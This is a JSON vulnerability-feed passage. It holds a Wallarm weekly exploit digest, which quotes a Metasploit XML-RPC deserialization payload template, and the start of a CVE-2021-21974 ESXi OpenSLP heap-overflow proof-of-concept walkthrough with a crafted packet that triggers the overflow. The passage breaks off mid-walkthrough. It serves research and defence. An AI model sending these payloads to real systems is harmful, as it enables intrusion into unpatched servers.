"HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-08T20:22:27", "id": "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0", "href": "https://lab.wallarm.com/why-wafs-cant-catch-vmware-cve-2021-21972-remote-code-execution-exploit/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-19T16:35:42", "description": "Welcome to the Wallarm weekly web exploits digest! Since this week, we will publish our weekly digests consists of web exploits with CVSS scores higher than 5. It will be followed by explanations, risks analysis, related stories and news. So, here we go! \n\n**The most sophisticated and interesting exploit** was out of this score for some reason, but who we are to argue with CVSS score  This is the Apache OFBiz XML-RPC Java Serialization Remote Code Execution issues <https://vulners.com/packetstorm/PACKETSTORM:161769> where you can find a XML-packed and Base64 encoded Java deserialization payload:\n \n \n <name>#{rand_text_alphanumeric(8..42)}</name> \n <value> \n <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable> \n </value> \n\nThis nutshell bypass WAFs, IPS/IDS, and NGFW systems by default since the malicious payload can be actually encoded there twice - by the Base64 first and then by XML encodings like built-in or defined entities. \n\n**The most dangerous exploit released last week **was definitely a VMware vCenter RCE. \n\nIn general, last week our harvest of exploits to CVSS 5+ scored vulnerabilities looks in the following way concerning their types:\n\nType| # \n---|--- \nFile upload| 2 \nPHP Object Injection| 2 \nSQL Injection| 2 \nBuffer overflow| 1 \nXSS| 1 \nSSFR| 1 \nDeserialization| 1 \nEnumeration| 1 \nThe week of March 8th - 15th web exploits stats, CVSS >5\n\nSo, the hackers' arsenal has been reinforced between dates of 2021-03-08 and 2021-03-15 with exploitation tools for the next software:\n\n * **VMware vCenter Server** - This one is the winner of the week having 10 points severity score\n * **QCubed 3.1.1** - Three high-severity exploits arrived for this product\n * **Golden FTP Server 4.70**\n * **HPE Systems Insight Manager**\n * **Joomla JCK Editor**\n * **SonLogger 4.2.3.3**\n * **Microsoft Exchange 2019**\n * **ForkCMS**\n * **Atlassian JIRA**\n\nHere is the list of the hi-scored reinforcements and a short brief for the headliners\u2019 mechanics:\n\n* * *\n\n2021-03-08 \n**[VMware vCenter Server File Upload / Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:161695>) \nScore: CVSS 10 \nType: File upload \nMetasploit + \n[CVE-2021-21972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972>)**\n\nThis new high-scored RCE metasploit module exploits an unauthenticated OVA file upload and a path traversal vulnerability in VMware vCenter Server. It writes a JSP payload to a web-accessible directory, and vulnerable Linux versions aren\u2019t exploitable via a web shell. Writing an SSH public key to authorized_keys works okay, but due to the user\u2019s non-existent password expiration in 90 days after install, this technique quite useless when applied in a production environment. Nevertheless, it works well with Windows appliances and older Linux versions. \n**Extra: \n[Why WAFs can\u2019t catch VMware CVE-2021-21972](<https://vulners.com/wallarmlab/WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0>)**\n\n* * *\n\n2021-03-09 \n**[Golden FTP Server 4.70 Buffer Overflow](<https://vulners.com/packetstorm/PACKETSTORM:161711>) \n[CVE-2006-6576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6576>) \nScore: CVSS 7.5 \nType: Buffer overflow**\n\nA buffer overflow exists in GoldenFTP authentication procedure. Note that the source IP address of the user performing the authentication forms part of the buffer and, as such, must be accounted for when calculating the appropriate offset. It should also be noted that the exploit is somewhat unstable, and if exploitation fails, GoldenFTP will be left in a state where it will still accept connections, but it will be unable to handle or process them in any way, so be careful.\n\n* * *\n\n2021-03-09 \n**[HPE Systems Insight Manager AMF Deserialization Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:161721>) \nCVSS 7.5 \n[CVE-2020-7200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-7200>) \nType: Deserialization**\n\nA remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be leveraged remotely by an unauthenticated attacker to execute code within the context of HPE System Insight Manager\u2019s hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due to a failure to validate data during the deserialization process when a user submits a POST request to the /simsearch/messagebroker/amfsecure page. The module exploits this vulnerability by leveraging an outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM to gain RCE as the administrative user running HPE SIM.\n\n* * *\n\n2021-03-12 \n**[QCubed 3.1.1 PHP Object Injection](<https://vulners.com/packetstorm/PACKETSTORM:161758>) \nScore: CVSS 7.5 \nType: PHP Object Injection \n[CVE-2020-24914](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24914>)**\n\nA PHP object injection bug in profile.php in qcubed (all versions including 3.1.1) unserializes the untrusted data of the POST-variable \u201cstrProfileData\u201d and allows an unauthenticated attacker to execute code remotely via a crafted POST request.\n\n* * *\n\n2021-03-12 \n**[QCubed 3.1.1 SQL Injection](<https://vulners.com/packetstorm/PACKETSTORM:161759>) \nScore: CVSS 7.5 \nType: SQL Injection \n[CVE-2020-24913](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24913>)**\n\nAn SQL injection vulnerability in qcubed (all versions including 3.1.1) in profile.php via the strQuery parameter allows an unauthenticated attacker to access the database by injecting SQL code via a crafted POST request. As a result, an unauthenticated attacker can get access the database remotely. In worst-case scenarios, an attacker might be able to execute code on the remote machine.\n\n* * *\n\n2021-03-08 \n**[Joomla JCK Editor 6.4.4 SQL Injection](<https://vulners.com/packetstorm/PACKETSTORM:161683>) \nScore: CVSS 7.5 \nType: SQL Injection \n[CVE-2018-17254](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-17254>)**\n\n* * *\n\n2021-03-15 \n**[SonLogger 4.2.3.3 Shell Upload (Unauthenticated Arbitrary File Upload)](<https://vulners.com/packetstorm/PACKETSTORM:161793>) \nScore: CVSS 7.5 \nType: File upload \n[CVE-2021-27964](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27964>) \nMetasploit +**\n\n* * *\n\n**[Microsoft Exchange 2019 - SSRF to Arbitrary File Write (Proxylogon)](<https://vulners.com/exploitdb/EDB-ID:49637>) \nScore: CVSS 7.5 \nType: SSRF \n[CVE-2021-27065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065>) \n[CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>)**\n\n* * *\n\n2021-03-12 \n**[QCubed 3.1.1 Cross Site Scripting](<https://vulners.com/packetstorm/PACKETSTORM:161763>) \nScore: CVSS 7.5 \nType: XSS \n[CVE-2020-24912](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24912>)**\n\n* * *\n\n2021-03-12 \n**[ForkCMS PHP Object Injection](<https://vulners.com/packetstorm/PACKETSTORM:161764>) \nScore: CVSS 6.5 \nType: PHP Object Injection \n[CVE-2020-24036](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-24036>)**\n\n* * *\n\n2021-03-10 \n**[Atlassian JIRA 8.11.1 User Enumeration](<https://vulners.com/packetstorm/PACKETSTORM:161730>) \nScore: CVSS 6.1 \nType: Enumeraion \n[CVE-2020-14181](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14181>)**\n\nThe post [Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.](<https://lab.wallarm.com/web-vulnerabilities-exploits-weekly-digest-1-march-8-15th-2021-vmware-vcenter-and-apache-ofbiz-rce/>) appeared first on [Wallarm](<https://lab.wallarm.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-16T18:22:00", "type": "wallarmlab", "title": "Web vulnerabilities exploit weekly digest #1. March 8-15th 2021. VMware vCenter and Apache OFBiz RCE.", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-6576", "CVE-2018-17254", "CVE-2020-14181", "CVE-2020-24036", "CVE-2020-24912", "CVE-2020-24913", "CVE-2020-24914", "CVE-2020-7200", "CVE-2021-21972", "CVE-2021-26855", "CVE-2021-27065", "CVE-2021-27964"], "modified": "2021-03-16T18:22:00", "id": "WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "href": "https://lab.wallarm.com/web-vulnerabilities-exploits-weekly-digest-1-march-8-15th-2021-vmware-vcenter-and-apache-ofbiz-rce/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T09:59:48", "description": "# My RCE PoC walkthrough for (CVE-2021\u201321974) VMware **ESXi OpenSLP heap-overflow vulnerability**\n\n\n[](https://images.seebug.org/1621923880306-w331s)\n\n\n\n# Introduction\n\nDuring a recent engagement, I discovered a machine that is running VMware ESXi\n6.7.0. Upon inspecting any known vulnerabilities associated with this version\nof the software, I identified it may be vulnerable to ESXi OpenSLP heap-\noverflow (CVE-2021-21974). Through googling, I found a [blog\npost](https://www.zerodayinitiative.com/blog/2021/3/1/cve-2020-3992-amp-\ncve-2021-21974-pre-auth-remote-code-execution-in-vmware-esxi) by Lucas Leong\n([@_wmliang_](http://twitter.com/_wmliang_)) of Trend Micro's Zero Day\nInitiative, who is the security researcher that found this bug. Lucas wrote a\nbrief overview on how to exploit the vulnerability but share no reference to a\nPoC. Since I couldn't find any existing PoC on the internet, I thought it\nwould be neat to develop an exploit based on Lucas' approach. Before\nproceeding, I highly encourage fellow readers to review Lucas' blog to get an\noverview of the bug and exploitation strategy from the founder's perspective.\n\n# Setup\n\nTo setup a test environment, I need a vulnerable copy of VMware ESXi for\ntesting and debugging. VMware offers [trial\nversion](https://my.vmware.com/en/web/vmware/evalcenter?p=free-esxi6) of ESXi\nfor download. Setup is straight forward by deploying the image through VMware\nFusion or similar tool. Once installation is completed, I used the web\ninterface to enable SSH. To debug the 'slpd' binary on the server, I used\ngdbserver that comes with the image. To talk to the gdbserver, I used SSH\nlocal port forwarding:\n\n ssh -L 1337:localhost:1337 root@<esxi-ip-address> 22\n\nOn the ESXi server, I attached gdbserver to 'slpd' as follow:\n\n /etc/init.d/slpd restart ; sleep 1 ; gdbserver -- attach localhost:1337 `ps | grep slpd | awk '{print $1}'`\n\nLastly, on my local gdb client, I connected to the gdbserver with the\nfollowing command:\n\n target remote localhost:1337\n\n# Service Location Protocol\n\nThe Service Location Protocol is a service discovery protocol that allows\nconnecting devices to identify services that are available within the local\narea network by querying a directory server. This is similar to a person\nwalking into a shopping center and looking at the directory listing to see\nwhat stores is in the mall. To keep this brief, a device can query about a\nservice and its location by making a ' **service request** ' and specifying\nthe type of service it wants to look up with an URL.\n\nFor example, to look up the VMInfrastructure service from the directory\nserver, the device will make a request with 'service:VMwareInfrastructure' as\nthe URL. The server will respond back with something like\n'service:VMwareInfrastructure://localhost.localdomain'.\n\nA device can also collect additional attributes and meta-data about a service\nby making an ' **attribute request** ' supplying the same URL. Devices that\nwant to be added to the directory can submit a ' **service registration** '.\nThis request will include information such as the IP of the device that is\nmaking the announcement, the type of service, and any meta-data that it wants\nto share. There are more functions the SLP can do, but the last message type I\nam interested in is the ' **directory agent advertisement** ' because this is\nwhere the vulnerability is at. The 'directory agent advertisement' is a\nbroadcast message sent by the server to let devices on the network know who to\nreach out if they wanted to query about a service and its location. To learn\nmore about SLP, please see[this](http://www.openslp.org/doc/html/IntroductionToSLP/) and[that](https://datatracker.ietf.org/doc/html/rfc2608).\n\n# SLP Packet Structure\n\nWhile the layout of the SLP structure will be slightly different between\ndifferent SLP message types, they generally follow a header + body format.\n\nA 'service request' packet looks like this:\n\n```\n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Service Location header (function = SrvRqst = 1) |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of <PRList> | <PRList> String \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of <service-type> | <service-type> String \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of <scope-list> | <scope-list> String \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of predicate string | Service Request <predicate> \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of <SLP SPI> string | <SLP SPI> String \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.1)\n\n[SLP Client-1] connect\n\nHeader: bytearray(b'\\x02\\x01\\x00\\x00=\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x02en')\nBody: bytearray(b'\\x00\\x00\\x00\\x1cservice:VMwareInfrastructure\\x00\\x07DEFAULT\\x00\\x00\\x00\\x00')\n\nlength of <PRList>: 0x0000\n<PRList> String: b''\nlength of <service-type>: 0x001c\n<service-type> string: b'service:VMwareInfrastructure'\nlength of <scope-list>: 0x0007\n<scope-list> string: b'DEFAULT'\nlength of predicate string: 0x0000\nService Request <predicate>: b''\nlength of <SLP SPI> string: 0x0000\n<SLP SPI> String: b''\n\n[SLP Client-1] service request\n[SLP Client-1] recv: b'\\x02\\x02\\x00\\x00N\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x02en\\x00\\x00\\x00\\x01\\x00\\xff\\xff\\x004service:VMwareInfrastructure://localhost.localdomain\\x00'\n\n```\n\nAn 'attribute request' packet looks like this:\n\n```\n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Service Location header (function = AttrRqst = 6) |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of PRList | <PRList> String \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of URL | URL \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of <scope-list> | <scope-list> string \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of <tag-list> string | <tag-list> string \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of <SLP SPI> string | <SLP SPI> string \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-10.3)\n \n[SLP Client-1] connect\n \nHeader: bytearray(b'\\x02\\x06\\x00\\x00=\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x02en')\nBody: bytearray(b'\\x00\\x00\\x00\\x1cservice:VMwareInfrastructure\\x00\\x07DEFAULT\\x00\\x00\\x00\\x00')\n\nlength of PRList: 0x0000\n<PRList> String: b''\nlength of URL: 0x001c\nURL: b'service:VMwareInfrastructure'\nlength of <scope-list>: 0x0007\n<scope-list> string: b'DEFAULT'\nlength of <tag-list> string: 0x0000\n<tag-list> string: b''\nlength of <SLP SPI> string: 0x0000\n<SLP SPI> string: b''\n\n[SLP Client-1] attribute request\n[SLP Client-1] recv: b'\\x02\\x07\\x00\\x00w\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x02en\\x00\\x00\\x00b(product=\"VMware ESXi 6.7.0 build-14320388\"),(hardwareUuid=\"23F14D56-C9F4-64FF-C6CE-8B0364D5B2D9\")\\x00' \n```\n\nA 'service registration' packet looks like this:\n\n```\n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Service Location header (function = SrvReg = 3) |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | <URL-Entry> \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of service type string | <service-type> \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of <scope-list> | <scope-list> \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | length of attr-list string | <attr-list> \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n |# of AttrAuths |(if present) Attribute Authentication Blocks...\\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.3)\n \n URL Entries\n \n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Reserved | Lifetime | URL Length |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n |URL len, contd.| URL (variable length) \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n |# of URL auths | Auth. blocks (if any) \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-4.3)\n \n[SLP Client-1] connect\n\nHeader: bytearray(b'\\x02\\x03\\x00\\x003\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x00\\x02en')\nBody: bytearray(b'\\x00\\x00x\\x00\\t127.0.0.1\\x00\\x00\\x0bservice:AAA\\x00\\x07default\\x00\\x03BBB\\x00')\n\n<URL-Entry>: \n\n Reserved: 0x00\n Lifetime: 0x0078\n URL Length: 0x0009\n URL (variable length): b'127.0.0.1'\n # of URL auths: 0x00\n Auth. blocks (if any): b''\n \nlength of service type string: 0x000b\n<service-type>: b'service:AAA'\nlength of <scope-list>: 0x0007\n<scope-list>: b'default'\nlength of attr-list string: 0x0003\n<attr-list>: b'BBB'\n# of AttrAuths: 0x00\n(if present) Attribute Authentication Blocks...: b''\n\n[SLP Client-1] service registration\n[SLP Client-1] recv: b'\\x02\\x05\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x14\\x00\\x02en\\x00\\x00'\n\n```\n\nLastly, a 'directory agent advertisement' packet looks like this:\n\n```\n 0 1 2 3\n 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Service Location header (function = DAAdvert = 8) |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Error Code | DA Stateless Boot Timestamp |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n |DA Stateless Boot Time,, contd.| Length of URL |\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n \\ URL \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Length of <scope-list> | <scope-list> \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Length of <attr-list> | <attr-list> \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | Length of <SLP SPI List> | <SLP SPI List> String \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n | # Auth Blocks | Authentication block (if any) \\\n +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n (diagram from https://datatracker.ietf.org/doc/html/rfc2608#section-8.5)\n\n[SLP Client-1] connect\n\nHeader: bytearray(b'\\x02\\x08\\x00\\x00N\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02en')\nBody: bytearray(b'\\x00\\x00`\\xa4`S\\x00+service:VMwareInfrastructure:/192.168.0.191\\x00\\x03BBB\\x00\\x00\\x00\\x00\\x00\\x00')\n\nError Code: 0x0000\nBoot Timestamp: 0x60a46053\nLength of URL: 0x002b\nURL: b'service:VMwareInfrastructure:/192.168.0.191'\nLength of <scope-list>: 0x0003\n<scope-list>: b'BBB'\nLength of <attr-list>: 0x0000\n<attr-list>: 0x0000\nLength of <SLP SPI List>: 0x0000\n<SLP SPI List> String: b''\n# Auth Blocks: 0x0000\nAuthentication block (if any): b''\n\n[SLP Client-1] directory agent advertisement\n[SLP Client-1] recv: b''\n```\n\n\n\n# **The Bug**\n\nAs noted in Lucas' blog, the bug is in the 'SLPParseSrvURL' function, which\ngets called when a 'directory agent advertisement' message is being process.\n\n```\nundefined4 SLPParseSrvUrl(int param_1,char *param_2,void **param_3)\n\n{\n char cVar1;\n void **__ptr;\n char *pcVar2;\n char *pcVar3;\n void *pvVar4;\n char *pcVar5;\n char *__src;\n char *local_28;\n void **local_24;\n \n if (param_2 == (char *)0x0) {\n return 0x16;\n }\n *param_3 = (void *)0x0;\n __ptr = (void **)calloc(1,param_1 + 0x1d); [1]\n if (__ptr == (void **)0x0) {\n return 0xc;\n }\n pcVar2 = strstr(param_2,\":/\"); [2]\n if (pcVar2 == (char *)0x0) {\n free(__ptr);\n return 0x16;\n }\n pcVar5 = param_2 + param_1;\n memcpy((void *)((int)__ptr + 0x15),param_2,(size_t)(pcVar2 + -(int)param_2)); [3]\n```\n\n\n\nOn line 18, the length of the URL is added with the number 0x1d to form the\nfinal size to 'calloc' from memory. On line 22, the 'strstr' function is\ncalled to seek the position of the substring \":/\" within the URL. On line 28,\nthe content of the URL before the substring \":/\" will be copied into the newly\n'calloced' memory from line 18.\n\nAnother thing to note is that the 'strstr' function will return 0 if the\nsubstring \":/\" does not exists or if the function hits a null character.\n\nI speculated VMware test case only tried 'scopes' with a length size below256. If we look at the following 'directory agent advertisement' layout snippet, we see sample 1's length of 'scopes' includes a null byte. This null byte accidentally acted as the string terminator for 'URL' since it sits right after it. If the length of 'scopes' is above 256, the hex representation of the length will not have a null byte (as in sample 2), and therefore the 'strstr' function will read passed the 'URL' and continue seeking the substring \":/\" in 'scopes'.\n\n```\nSample 1 - won't trigger bug:Body: bytearray(b'\\x00\\x00`\\xa4`S\\x00+service:VMwareInfrastructure:/192.168.0.191\\x00\\x03BBB\\x00\\x00\\x00\\x00\\x00\\x00')Error Code: 0x0000Boot Timestamp: 0x60a46053Length of URL: 0x002bURL: b'service:VMwareInfrastructure:/192.168.0.191'****** Length of <scope-list>: 0x0003 ******<scope-list>: b'BBB'Length of <attr-list>: 0x0000<attr-list>: 0x0000Length of <SLP SPI List>: 0x0000<SLP SPI List> String: b''# Auth Blocks: 0x0000Authentication block (if any): b''Sample 2 - triggers the bug:Body: bytearray(b'\\x00\\x00`\\xa4\\x9a\\x14\\x00\\x18AAAAAAAAAAAAAAAAAAAAAAAA\\x02\\x98BBBBBBBBBBBBBA\\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\\x00\\x00\\x00\\x00\\x00\\x00')Error Code: 0x0000Boot Timestamp: 0x60a49a14Length of URL: 0x0018URL: b'AAAAAAAAAAAAAAAAAAAAAAAA'****** Length of <scope-list>: 0x0298 ******<scope-list>: b'BBBBBBBBBBBBBA\\x01:/CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC'Length of <attr-list>: 0x0000<attr-list>: 0x0000Length of <SLP SPI List>: 0x0000<SLP SPI List> String: b''# Auth Blocks: 0x0000Authentication block (if any): b''\n```\n\n\n\nTherefore, the 'memcpy' call will lead to a heap overflow because the source\ncontains content from'URL' \\+ part of 'scopes' while the destination only have\nspaces to fit 'URL'.\n\n# SLP Objects\n\nHere I will go over the relevant SLP components as they serve as the building\nblocks for exploitation.\n\n## _SLPDSocket\n\nAll client that connects to the 'slpd' daemon will create a 'slpd-socket'\nobject on the heap. This object contains information on the current state of\nthe connection, such as whether it is in a reading state or writing state.\nOther important information stored in this object includes the client's IP\naddress, the socket file descriptor in-use for the connection, pointers to\n'recv-buffer' and 